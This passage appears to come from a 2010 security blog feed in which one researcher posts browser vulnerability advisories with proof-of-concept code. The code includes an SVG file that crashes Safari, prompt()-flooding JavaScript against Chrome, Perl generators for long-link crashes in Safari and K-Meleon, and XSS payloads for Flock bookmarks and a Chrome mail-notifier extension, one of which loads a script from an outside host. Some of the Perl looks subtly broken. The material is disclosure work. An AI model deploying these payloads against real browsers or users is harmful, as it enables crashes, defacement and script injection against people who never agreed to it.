#######################€ND ########################<br /> <br /> Thnx To Climbo for his patience and support.<br /> <br /> Atentamente:<br /> Lostmon (lostmon@gmail.com)<br /> Web-Blog: http://lostmon.blogspot.com/<br /> Google group: http://groups.google.com/group/lostmon (new)<br /> --<br /> La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com) Web-Blog: http://lostmon.blogspot.com/ Google group: http://groups.google.com/group/lostmon (new) -- La curiosidad es lo que hace mover la mente....<img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9011578-2406501614498517796?l=lostmon.blogspot.com' alt='' /></div> <p><a href="http://feedads.g.doubleclick.net/~a/GADFeN7_lmTRavxUb8QwYxAdHxI/0/da"><img src="http://feedads.g.doubleclick.net/~a/GADFeN7_lmTRavxUb8QwYxAdHxI/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/GADFeN7_lmTRavxUb8QwYxAdHxI/1/da"><img src="http://feedads.g.doubleclick.net/~a/GADFeN7_lmTRavxUb8QwYxAdHxI/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/LostmonBlogger/~4/x2ky8mCQsoM" height="1" width="1"/>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comhttp://lostmon.blogspot.com/2010/09/google-chrome-instaled-extensions.htmltag:blogger.com,1999:blog-9011578.post-75045086477326436952010-08-30T17:55:00.003+02:002010-08-30T18:00:29.590+02:002010-08-30T18:00:29.590+02:00###################################################<br /> Safari for windows Invalid SGV text style &nbsp;Webkit.dll DoS<br /> Vendor URL:www.apple.com<br /> Advisore:<a href="http://lostmon.blogspot.com/2010/08/safari-for-windows-invalid-sgv-text.html">http://lostmon.blogspot.com/2010/08/safari-for-windows-invalid-sgv-text.html</a><br /> Vendor notify :Yes exploit available :YES<br /> ###################################################<br /> <br /> Safari browser for windows is prone vulnerable to a Denial of<br /> service condition , this issue affects webkit.dll and cause a<br /> crash when Safari try to render a SGV image with a very long<br /> font size text style.<br /> <br /> <br /> <br /> ############<br /> versions<br /> ############<br /> <br /> Safari for windows 5.0.1 (7533.17.8)<br /> on windows 7 ultimate fully patched.<br /> <br /> <br /> Safari for windows windows 5.0.1 (7533.17.8)<br /> on windows xp home sp3 fully patched<br /> <br /> <br /> ############<br /> Timeline<br /> ############<br /> <br /> Discovered:19-08-2010<br /> vendor notofy:25-08-2010<br /> Vendor response:26-08-2010<br /> Disclosure: 30-09-2010<br /> <br /> ####################<br /> Proof Of Concept<br /> ####################<br /> <br /> Save This code as image.svg and open it with Safari,look<br /> i have add some "extra" pixels in font size text style.<br /> <br /> ################ BOF image.svg ######################<br /> <br /> &lt;?xml version="1.0"?&gt;<br /> &lt;svg xmlns="http://www.w3.org/2000/svg" width="200" height="200" version="1.1"&gt;<br /> &lt;defs&gt;<br /> &lt;mask id="crash"&gt;<br /> &lt;polygon points="155.5,45.6146 181.334,119.935 260,121.538 197.3,169.074 <br /> 220.085,244.385 155.5,199.444 90.9154,244.385 113.7,169.074 <br /> 51,121.538 129.666,119.935"<br /> transform="matrix(1 0 0 1.04643 1.9873e-014 -6.73254) <br /> translate(-52.381 -37.9218)"<br /> style="fill:rgb(255,255,255);stroke:rgb(0,0,0);stroke-width:1" /&gt;<br /> &lt;/mask&gt;<br /> &lt;/defs&gt;<br /> <br /> &lt;g mask="url(#crash)" style="font-family:Verdana; font-size: 10pt; fill:red;"&gt; <br /> &lt;text x="80" y="80" style="font-size:111000000pt; fill:pink;"&gt;Safari&lt;/text&gt;<br /> &lt;text x="0" y="130" style="font-size: 60pt; fill:pink;"&gt;Now&lt;/text&gt;<br /> &lt;text x="20" y="190" style="font-size: 60pt; fill:pink;"&gt;Crash&lt;/text&gt;<br /> &lt;/g&gt;<br /> <br /> &lt;/svg&gt;<br /> <br /> ###############EOF####################<br /> <br /> ################# €nd ###############<br /> <br /> <span class="Apple-style-span" style="color: #666666; font-family: Verdana, sans-serif; font-size: 12px;">Thnx To Climbo for his patience and support.</span><br /> <br /> <span class="Apple-style-span" style="color: #666666; font-family: Verdana, sans-serif; font-size: 12px;">Atentamente:</span><span class="Apple-style-span" style="color: #666666; font-family: Verdana, sans-serif; font-size: 12px;"><br /> </span><span class="Apple-style-span" style="color: #666666; font-family: Verdana, sans-serif; font-size: 12px;">Lostmon (lostmon@gmail.com)</span><span class="Apple-style-span" style="color: #666666; font-family: Verdana, sans-serif; font-size: 12px;"><br /> </span><span class="Apple-style-span" style="color: #666666; font-family: Verdana, sans-serif; font-size: 12px;">Web-Blog: http://lostmon.blogspot.com/</span><span class="Apple-style-span" style="color: #666666; font-family: Verdana, sans-serif; font-size: 12px;"><br /> </span><span class="Apple-style-span" style="color: #666666; font-family: Verdana, sans-serif; font-size: 12px;">Google group: http://groups.google.com/group/lostmon (new)</span><span class="Apple-style-span" style="color: #666666; font-family: Verdana, sans-serif; font-size: 12px;"><br /> </span><span class="Apple-style-span" style="color: #666666; font-family: Verdana, sans-serif; font-size: 12px;">--</span><span class="Apple-style-span" style="color: #666666; font-family: Verdana, sans-serif; font-size: 12px;"><br /> </span><span class="Apple-style-span" style="color: #666666; font-family: Verdana, sans-serif; font-size: 12px;">La curiosidad es lo que hace mover la mente....</span><div class="blogger-post-footer">Lostmon (lostmon@gmail.com) Web-Blog: http://lostmon.blogspot.com/ Google group: http://groups.google.com/group/lostmon (new) -- La curiosidad es lo que hace mover la mente....<img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9011578-7504508647732643695?l=lostmon.blogspot.com' alt='' /></div> <p><a href="http://feedads.g.doubleclick.net/~a/xra4VTiF92rqEJXkK2HKy0kOBQ8/0/da"><img src="http://feedads.g.doubleclick.net/~a/xra4VTiF92rqEJXkK2HKy0kOBQ8/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/xra4VTiF92rqEJXkK2HKy0kOBQ8/1/da"><img src="http://feedads.g.doubleclick.net/~a/xra4VTiF92rqEJXkK2HKy0kOBQ8/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/LostmonBlogger/~4/mVpl5_3XevU" height="1" width="1"/>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comhttp://lostmon.blogspot.com/2010/08/safari-for-windows-invalid-sgv-text.htmltag:blogger.com,1999:blog-9011578.post-62599487827233995992010-08-19T16:50:00.005+02:002010-08-19T17:00:13.276+02:002010-08-19T17:00:13.276+02:00#########################################<br /> Flock Browser 3.0.0.3989 Malformed Bookmark XSS<br /> Vendor URL: http://beta.flock.com/<br /> Advisore: http://lostmon.blogspot.com/2010/08/flock-browser-3003989-malformed.html<br /> Vendor notify:NO exploits availables:YES<br /> #########################################<br /> <br /> Flock is faster, simpler, and more friendly. Literally. <br /> It's the only sleek, modern web browser with the built-in <br /> ability to keep you up-to-date with your Facebook and Twitter <br /> friends.This browser version (3.0.0.3989) is based in a old<br /> chromium project<br /> <br /> <br /> Flock has a flaw that allows Cross-site scripting style attacks<br /> In bookmarks is has a Malformed bookmark title persistent xss<br /> when inport from other browsers a malformed bookmark or when add<br /> a new malformed bookmark or import a bookmark html file.<br /> <br /> ###############################<br /> Example Of Bookmark html file<br /> ###############################<br /> <br /> &lt;!DOCTYPE NETSCAPE-Bookmark-file-1&gt;<br /> &lt;!-- This is an automatically generated file.<br /> &nbsp;&nbsp;&nbsp;&nbsp; It will be read and overwritten.<br /> &nbsp;&nbsp;&nbsp;&nbsp; DO NOT EDIT! --&gt;<br /> &lt;META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"&gt;<br /> &lt;TITLE&gt;Bookmarks&lt;/TITLE&gt;<br /> &lt;H1&gt;Menú Marcadores&lt;/H1&gt;<br /> &lt;DL&gt;&lt;p&gt;<br /> &lt;DT&gt;&lt;A HREF="http://www.mozilla.org" ADD_DATE="1282083605" LAST_MODIFIED="1282083638"&gt;&amp;quot;&amp;gt;&amp;lt;script src='http://vuln.xssed.net/thirdparty/scripts/ckers.org.js'&amp;gt;&lt;/A&gt;<br /> &lt;/DL&gt;&lt;p&gt;<br /> <br /> #####################EOF##################<br /> <br /> &nbsp;It is a persintent script insercion and when the user click in the menu for view<br /> favorites page or access directly to favorites url&nbsp; this make a "defacement" of this page and them the user can´t access to favorites :)<br /> ( Url of favorites =&gt; chrome-extension://flock_people/favorites.html#p=1&amp;v=all&amp;o=0&amp;s=title )<br /> <br /> &nbsp;################# €nd #######################<br /> <br /> Atentamente:<br /> Lostmon (lostmon@gmail.com)<br /> Web-Blog: http://lostmon.blogspot.com/<br /> Google group: http://groups.google.com/group/lostmon (new)<br /> --<br /> La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com) Web-Blog: http://lostmon.blogspot.com/ Google group: http://groups.google.com/group/lostmon (new) -- La curiosidad es lo que hace mover la mente....<img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9011578-6259948782723399599?l=lostmon.blogspot.com' alt='' /></div> <p><a href="http://feedads.g.doubleclick.net/~a/YctpX_PlonPI5PdmDN3Tv8xauz8/0/da"><img src="http://feedads.g.doubleclick.net/~a/YctpX_PlonPI5PdmDN3Tv8xauz8/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/YctpX_PlonPI5PdmDN3Tv8xauz8/1/da"><img src="http://feedads.g.doubleclick.net/~a/YctpX_PlonPI5PdmDN3Tv8xauz8/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/LostmonBlogger/~4/u0qLRRRZtKQ" height="1" width="1"/>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comhttp://lostmon.blogspot.com/2010/08/flock-browser-3003989-malformed.htmltag:blogger.com,1999:blog-9011578.post-33779296886840362742010-08-16T22:17:00.002+02:002010-08-16T22:21:18.618+02:002010-08-16T22:21:18.618+02:00###############################################<br /> Google Chrome and Chrome frame Prompt DoS<br /> Vendor URL: http://www.google.com<br /> Advisore:http://lostmon.blogspot.com/2010/08/google-chrome-and-chrome-frame-prompt.html<br /> Advosore spanish:http://rootdev.blogspot.com/2010/08/google-chrome-and-chrome-frame-prompt.html<br /> Vendor notify: YES exploit available:YES<br /> ###############################################<br /> <br /> This Bug was discoveres by me and i have tested it<br /> and investigate with Climbo From #ayuda-informaticos<br /> on irc-hispano channel.<br /> <br /> #########<br /> abstract <br /> #########<br /> <br /> Some times the web aplications need to Prompt some data to users,<br /> it can prompt via javascript code , or via html forms ...<br /> <br /> In the case of javascript prompts what´s happend if<br /> the data to prompt ( the question) is very long ?¿<br /> <br /> ################<br /> <br /> Google chrome is prone vulnerable to a Denial of service<br /> condition via "alert prompts" wen the data expected is very long ...<br /> <br /> i don´t know if this can be turn in a remote code execution or <br /> memory corruption with some heap spray or similar but i think <br /> that this need to be analyze & patch <br /> <br /> <br /> ###################<br /> Versions Tested<br /> ###################<br /> <br /> In all cases chrome is the vector to do<br /> something in all systems :)<br /> <br /> <br /> ######################<br /> MAC OS X leopard 10.5<br /> ######################<br /> <br /> Google Chrome5.0.375.126 (Build oficial 53802) WebKit 533.4<br /> V8 2.1.10.15<br /> User Agent Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) <br /> AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.126 Safari/533.4<br /> Command Line /Applications/Google Chrome.app/Contents/MacOS/Google Chrome -psn_0_794818<br /> <br /> In all cases OS X closes all Chrome Windows.( Chrome Crash)<br /> <br /> <br /> ##############<br /> ubuntu 10.04<br /> ##############<br /> Chromium 5.0.375.99 (Developer Build 51029) Ubuntu 10.04<br /> WebKit 533.4 <br /> V8 2.1.10.14<br /> User Agent Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/533.4 <br /> (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4<br /> Command Line /usr/lib/chromium-browser/chromium-browser<br /> <br /> In al cases Chrome is minimized and denies the access to <br /> "window manager button" and we can´t no change beetwen applications<br /> that we have open.<br /> <br /> <br /> ##################<br /> Windows 7 32 bits<br /> ###################<br /> <br /> Google Chrome 5.0.375.86 (Build oficial 49890)<br /> on windows 7 ultimate fully patched.<br /> <br /> It causes a DoS in chrome and a DoS in IE8 when <br /> exploit it across Google Chrome Frame.<br /> <br /> ###############<br /> Debian 2.6.26<br /> ###############<br /> <br /> Google Chrome 6.0.472.25 (Build oficial 55113) devWebKit 534.3<br /> V82.2.24.11<br /> User Agent Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit 534.3<br /> <br /> in all cases Debian Closes all chrome Windows.( Chrome Crash)<br /> <br /> <br /> ####################<br /> Proof Of Concepts<br /> ####################<br /> <br /> this PoC is for testing in win7 32 bits, chrome <br /> and chrome frame in conjuncion with ie8 that causes <br /> a DoS in ie8 <br /> <br /> #############################<br /> &lt;meta http-equiv="X-UA-Compatible" content="chrome=1"&gt;<br /> &lt;h1&gt; wait 10 or 11 seconds :)&lt;/h1&gt;<br /> &lt;script&gt;<br /> <br /> function do_buffer(payload, len) {<br /> while(payload.length &lt; (len * 2)) payload += payload;<br /> payload = payload.substring(0, len);<br /> return payload;<br /> }<br /> function DoS()<br /> {<br /> var buffer = do_buffer(unescape('%u0c0c%u0c0c'), 38000);<br /> prompt(buffer);<br /> }<br /> setTimeout('DoS()',1000);<br /> &lt;/script&gt;<br /> ################# EOF ###################<br /> <br /> This second PoC is for test in Linux or in Mac OS X<br /> <br /> #######################################<br /> &lt;h1&gt; wait 10 or 11 seconds :)&lt;/h1&gt;<br /> &lt;script&gt;<br /> <br /> function do_buffer(payload, len) {<br /> while(payload.length &lt; (len * 2)) payload += payload;<br /> payload = payload.substring(0, len);<br /> return payload;<br /> }<br /> function DoS()<br /> {<br /> var buffer = do_buffer(unescape('%u0c0c%u0c0c'), 50000);<br /> prompt(buffer);<br /> }<br /> setTimeout('DoS()',1000);<br /> &lt;/script&gt;<br /> ################# EOF ###################<br /> <br /> ############<br /> References<br /> ############<br /> related vuln:<br /> http://lostmon.blogspot.com/2010/07/ie8-on-windows-7-32-bits-unspecified.html<br /> <br /> Google chrome bugtrack:<br /> http://code.google.com/p/chromium/issues/detail?id=47617<br /> <br /> ################### €nd ###################<br /> <br /> Thnx To Climbo for his patience and support.<br /> <br /> atentamente:<br /> Lostmon (lostmon@gmail.com)<br /> Web-Blog: http://lostmon.blogspot.com/<br /> Google group: http://groups.google.com/group/lostmon (new)<br /> --<br /> La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com) Web-Blog: http://lostmon.blogspot.com/ Google group: http://groups.google.com/group/lostmon (new) -- La curiosidad es lo que hace mover la mente....<img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9011578-3377929688684036274?l=lostmon.blogspot.com' alt='' /></div> <p><a href="http://feedads.g.doubleclick.net/~a/rUMFSxE-mfIzo7thDBW8tvptUyw/0/da"><img src="http://feedads.g.doubleclick.net/~a/rUMFSxE-mfIzo7thDBW8tvptUyw/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/rUMFSxE-mfIzo7thDBW8tvptUyw/1/da"><img src="http://feedads.g.doubleclick.net/~a/rUMFSxE-mfIzo7thDBW8tvptUyw/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/LostmonBlogger/~4/lqp_KrXqA_A" height="1" width="1"/>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comhttp://lostmon.blogspot.com/2010/08/google-chrome-and-chrome-frame-prompt.htmltag:blogger.com,1999:blog-9011578.post-36209861201760653232010-08-04T17:35:00.002+02:002010-08-04T17:38:08.893+02:002010-08-04T17:38:08.893+02:00############################################<br /> Safari for windows Long link DoS<br /> Vendor URL:http://www.apple.com/safari/<br /> Advisore:http://lostmon.blogspot.com/2010/08/safari-for-windows-long-link-dos.html<br /> Vendor notified:Yes exploit available: YES<br /> ############################################<br /> <br /> Safari is prone vulnerable to Dos with a very long Link...<br /> This issue is exploitable via web links like &lt;a href="very long URL"&gt;<br /> click here&lt;/a&gt; or similar vectors. Safari fails to render the link <br /> and it turn Frozen resulting in a Denial of service condition.<br /> <br /> #################<br /> Versions Tested<br /> #################<br /> <br /> I have tested this issue in win xp sp3 and a windows 7 fully pached.<br /> <br /> Win XP sp3:<br /> <br /> Safari 5.0.X vulnerable<br /> Safari 4.xx vulnerable <br /> <br /> windows 7 Ultimate:<br /> <br /> Safari 5.0.X vulnerable<br /> Safari 4.xx vulnerable <br /> <br /> ############<br /> References<br /> ############<br /> <br /> Discovered: 29-07-2010<br /> vendor notify:31-07-2010<br /> Vendor Response:<br /> Vendor patch:<br /> <br /> ####################<br /> Proof Of Concept<br /> ####################<br /> <br /> #######################################################################<br /> #!/usr/bin/perl<br /> # safari & k-meleon Long "a href" Link DoS<br /> # Author: Lostmon Lords Lostmon@gmail.com http://lostmon.blogspot.com<br /> # Safari 5.0.1 ( 7533,17,8) and prior versions Long link DoS<br /> # generate the file open it with safari wait a seconds<br /> ######################################################################<br /> <br /> $archivo = $ARGV[0];<br /> if(!defined($archivo))<br /> {<br /> <br /> print "Usage: $0 &lt;archivo.html&gt;\n";<br /> <br /> }<br /> <br /> $cabecera = "&lt;html&gt;" . "\n";<br /> $payload = "&lt;a href=\"about:neterror?e=connectionFailure&c=" . "/" x 1028135 . "\">click here if you can :)&lt;/a&gt;" . "\n";<br /> $fin = "&lt;/html&gt;";<br /> <br /> $datos = $cabecera . $payload . $fin;<br /> <br /> open(FILE, '&lt;' . $archivo);<br /> print FILE $datos;<br /> close(FILE);<br /> <br /> exit;<br /> <br /> ################## EOF ######################<br /> <br /> ##############<br /> Related Links<br /> ##############<br /> <br /> vendor bugtracker : http://kmeleon.sourceforge.net/bugs/viewbug.php?bugid=1251<br /> Posible related Vuln: https://bugzilla.mozilla.org/show_bug.cgi?id=583474<br /> Test Case : https://bugzilla.mozilla.org/attachment.cgi?id=461776<br /> <br /> ###################### €nd #############################<br /> <br /> Thnx to Phreak for support and let me undestanding the nature of this bug<br /> thnx to jajoni for test it in windows 7 X64 bits version.<br /> <br /> atentamente:<br /> Lostmon (lostmon@gmail.com)<br /> Web-Blog: http://lostmon.blogspot.com/<br /> Google group: http://groups.google.com/group/lostmon (new)<br /> --<br /> La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com) Web-Blog: http://lostmon.blogspot.com/ Google group: http://groups.google.com/group/lostmon (new) -- La curiosidad es lo que hace mover la mente....<img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9011578-3620986120176065323?l=lostmon.blogspot.com' alt='' /></div> <p><a href="http://feedads.g.doubleclick.net/~a/ZFPkTAiHvgTehQ9TvgVFJ4tlyYw/0/da"><img src="http://feedads.g.doubleclick.net/~a/ZFPkTAiHvgTehQ9TvgVFJ4tlyYw/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/ZFPkTAiHvgTehQ9TvgVFJ4tlyYw/1/da"><img src="http://feedads.g.doubleclick.net/~a/ZFPkTAiHvgTehQ9TvgVFJ4tlyYw/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/LostmonBlogger/~4/7Zs_ZEMnrBM" height="1" width="1"/>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comhttp://lostmon.blogspot.com/2010/08/safari-for-windows-long-link-dos.htmltag:blogger.com,1999:blog-9011578.post-15752782263271041052010-08-04T17:18:00.002+02:002010-08-04T17:23:39.743+02:002010-08-04T17:23:39.743+02:00############################################<br /> K-Meleon for windows about:neterror Stack Overflow DoS<br /> Vendor URL:http://kmeleon.sourceforge.net/<br /> Advisore:http://lostmon.blogspot.com/2010/08/k-meleon-for-windows-aboutneterror-dos.html<br /> Vendor notified:Yes exploit available: YES<br /> ############################################<br /> <br /> K-Meleon is an extremely fast, customizable, lightweight web browser<br /> based on the Gecko layout engine developed by Mozilla which is also <br /> used by Firefox. K-Meleon is free, open source software released under<br /> the GNU General Public License and is designed specifically for <br /> Microsoft Windows (Win32) operating systems.<br /> <br /> K-Meleon is prone vulnerable to crashing with a very long URL...<br /> Internal web pages like about:neterror does not limit the amount of <br /> chars that a user put in 'c' 'd' params and them if we compose a <br /> malformed url the browser can be chash easy.This issue is exploitable<br /> via web links like <a href="http://www.blogger.com/very%20long%20URL">click here</a> or via <br /> window.location.replace('very long url') or similar vectors.<br /> <br /> #################<br /> Versions Tested<br /> #################<br /> <br /> I have tested this issue in win xp sp3 and a windows 7 fully pached.<br /> <br /> Win XP sp3:<br /> K-meleon 1.5.3 &amp; 1.5.4 Vulnerables.(crashes )<br /> K-Meleon 1.6.0a4 Vulnerables.(crashes)<br /> <br /> windows 7 Ultimate:<br /> K-meleon 1.5.3 &amp; 1.5.4 Vulnerables.(crashes)<br /> K-Meleon 1.6.0a4 Vulnerables.(crashes)<br /> <br /> ############<br /> References<br /> ############<br /> <br /> Discovered: 29-07-2010<br /> vendor notify:31-07-2010<br /> Vendor Response:<br /> Vendor patch:<br /> <br /> ########################<br /> ASM code stack overflow<br /> ########################<br /> <br /> <div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/_oOk20qcOiUk/TFmDVYmRvHI/AAAAAAAAADM/GMymL2zrnRc/s1600/k-meleon.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="125" src="http://2.bp.blogspot.com/_oOk20qcOiUk/TFmDVYmRvHI/AAAAAAAAADM/GMymL2zrnRc/s200/k-meleon.png" width="200" /></a></div>################ <br /> #Proof Of Concept <br /> ################ <br /> <br /> #######################################################################<br /> #!/usr/bin/perl<br /> # k-meleon Long "a href" Link DoS<br /> # Author: Lostmon Lords Lostmon@gmail.com http://lostmon.blogspot.com<br /> # k-Meleon versions 1.5.3 & 1.5.4 internal page about:neterror DoS<br /> # generate the file open it with k-keleon click in the link and wait a seconds<br /> ######################################################################<br /> <br /> $archivo = $ARGV[0];<br /> if(!defined($archivo))<br /> {<br /> <br /> print "Usage: $0 &lt;archivo.html&gt;\n";<br /> <br /> }<br /> <br /> $cabecera = "&lt;html&gt;" . "\n";<br /> $payload = "&lt;a href=\"about:neterror?e=connectionFailure&c=" . "/" x 1028135 . "\">click here if you can :)&lt;/a&gt;" . "\n";<br /> $fin = "&lt;/html&gt;";<br /> <br /> $datos = $cabecera . $payload . $fin;<br /> <br /> open(FILE, '&lt;' . $archivo);<br /> print FILE $datos;<br /> close(FILE);<br /> <br /> exit;<br /> <br /> ################## EOF ######################<br /> <br /> ##############<br /> Related Links<br /> ##############<br /> <br /> vendor bugtracker : http://kmeleon.sourceforge.net/bugs/viewbug.php?bugid=1251<br /> Posible related Vuln: https://bugzilla.mozilla.org/show_bug.cgi?id=583474<br /> Test Case : https://bugzilla.mozilla.org/attachment.cgi?id=461776<br /> <br /> ###################### €nd #############################<br /> <br /> Thnx to Phreak for support and let me undestanding the nature of this bug<br /> thnx to jajoni for test it in windows 7 X64 bits version.<br /> <br /> atentamente:<br /> Lostmon (lostmon@gmail.com)<br /> Web-Blog: http://lostmon.blogspot.com/<br /> Google group: http://groups.google.com/group/lostmon (new)<br /> --<br /> La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com) Web-Blog: http://lostmon.blogspot.com/ Google group: http://groups.google.com/group/lostmon (new) -- La curiosidad es lo que hace mover la mente....<img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9011578-1575278226327104105?l=lostmon.blogspot.com' alt='' /></div> <p><a href="http://feedads.g.doubleclick.net/~a/QjqON93SZtpzVaA3_App_3gJWnw/0/da"><img src="http://feedads.g.doubleclick.net/~a/QjqON93SZtpzVaA3_App_3gJWnw/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/QjqON93SZtpzVaA3_App_3gJWnw/1/da"><img src="http://feedads.g.doubleclick.net/~a/QjqON93SZtpzVaA3_App_3gJWnw/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/LostmonBlogger/~4/aQrN9HUv8rQ" height="1" width="1"/>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comhttp://lostmon.blogspot.com/2010/08/k-meleon-for-windows-aboutneterror-dos.htmltag:blogger.com,1999:blog-9011578.post-7127686386080026322010-07-13T16:48:00.001+02:002010-07-13T16:51:46.431+02:002010-07-13T16:51:46.431+02:00##########################################<br /> IE8 On windows 7 32 bits unspecified DoS<br /> Vendor URL:http://www.microsoft.com<br /> Advisore:http://lostmon.blogspot.com/2010/07/ie8-on-windows-7-32-bits-unspecified.html<br /> Vendor Notify:YES Vendor confirmed:YES <br /> EXPLOIT:Private<br /> ###########################################<br /> <br /> A posible flaw exits in Internet explorer 8<br /> on windows 7 32-bits ,that can cause a remote <br /> denial of service from a malformed web page.<br /> <br /> This issue is tiggered when IE8 try to render<br /> Modal app prompt in conjuncion with thirds appz that <br /> uses recurses from IE8 and try to render text inputs<br /> it is a posible GDI text-rendering<br /> APIs bug or or DrawText() functions involved.<br /> <br /> When the victim visit a malformed web page, an close the 2nd<br /> appz, this appz turns unstable and needs to close , and then <br /> when IE8 try to restore<br /> the tab ,it los the focus from application and it results in<br /> a denial of service to this window , because we can't click <br /> in any bar , in any button or do some action in this window,<br /> ie8 aparently is frozen.<br /> <br /> After several test this issue only is reproducible in win7 32 bits<br /> <br /> I have a exploit or PoC for this issue , but it's<br /> private at this time :)<br /> <br /> Solution:<br /> Microsoft know that as a stability bug and they add it <br /> for consideration in a future version to address it.<br /> <br /> #################### €nd ##########################<br /> <br /> Thnx for your time !!!<br /> atentamente:<br /> Lostmon (lostmon@gmail.com)<br /> Web-Blog: http://lostmon.blogspot.com/<br /> Google group: http://groups.google.com/group/lostmon (new)<br /> --<br /> La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com) Web-Blog: http://lostmon.blogspot.com/ Google group: http://groups.google.com/group/lostmon (new) -- La curiosidad es lo que hace mover la mente....<img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9011578-712768638608002632?l=lostmon.blogspot.com' alt='' /></div> <p><a href="http://feedads.g.doubleclick.net/~a/NMpKG4EOm6XQygdcNMySub1zRcs/0/da"><img src="http://feedads.g.doubleclick.net/~a/NMpKG4EOm6XQygdcNMySub1zRcs/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/NMpKG4EOm6XQygdcNMySub1zRcs/1/da"><img src="http://feedads.g.doubleclick.net/~a/NMpKG4EOm6XQygdcNMySub1zRcs/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/LostmonBlogger/~4/d6MTuYmj7ok" height="1" width="1"/>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comhttp://lostmon.blogspot.com/2010/07/ie8-on-windows-7-32-bits-unspecified.htmltag:blogger.com,1999:blog-9011578.post-20525046171012963252010-06-18T21:09:00.003+02:002010-06-18T21:10:21.085+02:002010-06-18T21:10:21.085+02:00######################################<br /> Google Services Notifier Chrome extension XSS/CSRF<br /> extension:https://chrome.google.com/extensions/detail/dmgbflokapnkfnegeigclohhplnflgie<br /> advisore:http://lostmon.blogspot.com/2010/06/google-services-notifier-chrome.html<br /> Exploit available:yes vendor notify : NO<br /> #######################################<br /> <br /> So in this case "Notifier for Google Wave Chrome" <br /> has a flaw that allow attackers to make XSS style attacks.<br /> <br /> All extensions runs over his origin and no have way to altered data from extension <br /> or get sensitive data like , email account or password etc..<br /> <br /> if we look how many users have instaled this extension =><br /> https://chrome.google.com/extensions/detail/dmgbflokapnkfnegeigclohhplnflgie<br /> 109 users have instaled it (WoW)<br /> <br /> ############<br /> explanation<br /> ############<br /> <br /> Google Services Notifier allows users to view wen they have a new wave and<br /> view a preview of it ....<br /> <br /> "Keep you update with Google services like Google Mail,Blogger,Reader,YouTube,<br /> Google Docs, Google Wave etc. More services will be added soon."<br /> <br /> If a attacker compose a new mail with html or javascript code in <br /> subject & send it to victim´s the code is executed wen Victim´s click in the<br /> extension to view a preview of mail.<br /> <br /> So for exploit we need to compose a "special" mail<br /> for example if we put directly in the mail subject a iframe like<br /> "&gt;&lt;iframe src="javascript:alert(location.href);"&gt;&lt;/iframe&gt;<br /> in the two cases the alert is executed wen try to preview the mail <br /> with the extension :) it is executed in context location.href value is<br /> "about:blank"<br /> <br /> For example send a mail With a logout acction in google wave in body<br /> "&gt;&lt;iframe src="https://wave.google.com/wave/logout"&gt;&lt;/iframe&gt;<br /> it closes the sesion on google wave , this is a CSRF.<br /> <br /> ######################€nd#################################<br /> .<br /> Thnx for your time !!!<br /> atentamente:<br /> Lostmon (lostmon@gmail.com)<br /> Web-Blog: http://lostmon.blogspot.com/<br /> Google group: http://groups.google.com/group/lostmon (new)<br /> --<br /> La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com) Web-Blog: http://lostmon.blogspot.com/ Google group: http://groups.google.com/group/lostmon (new) -- La curiosidad es lo que hace mover la mente....<img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9011578-2052504617101296325?l=lostmon.blogspot.com' alt='' /></div> <p><a href="http://feedads.g.doubleclick.net/~a/-8cV8obUe16QnKqbjJ2QE8nmqDE/0/da"><img src="http://feedads.g.doubleclick.net/~a/-8cV8obUe16QnKqbjJ2QE8nmqDE/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/-8cV8obUe16QnKqbjJ2QE8nmqDE/1/da"><img 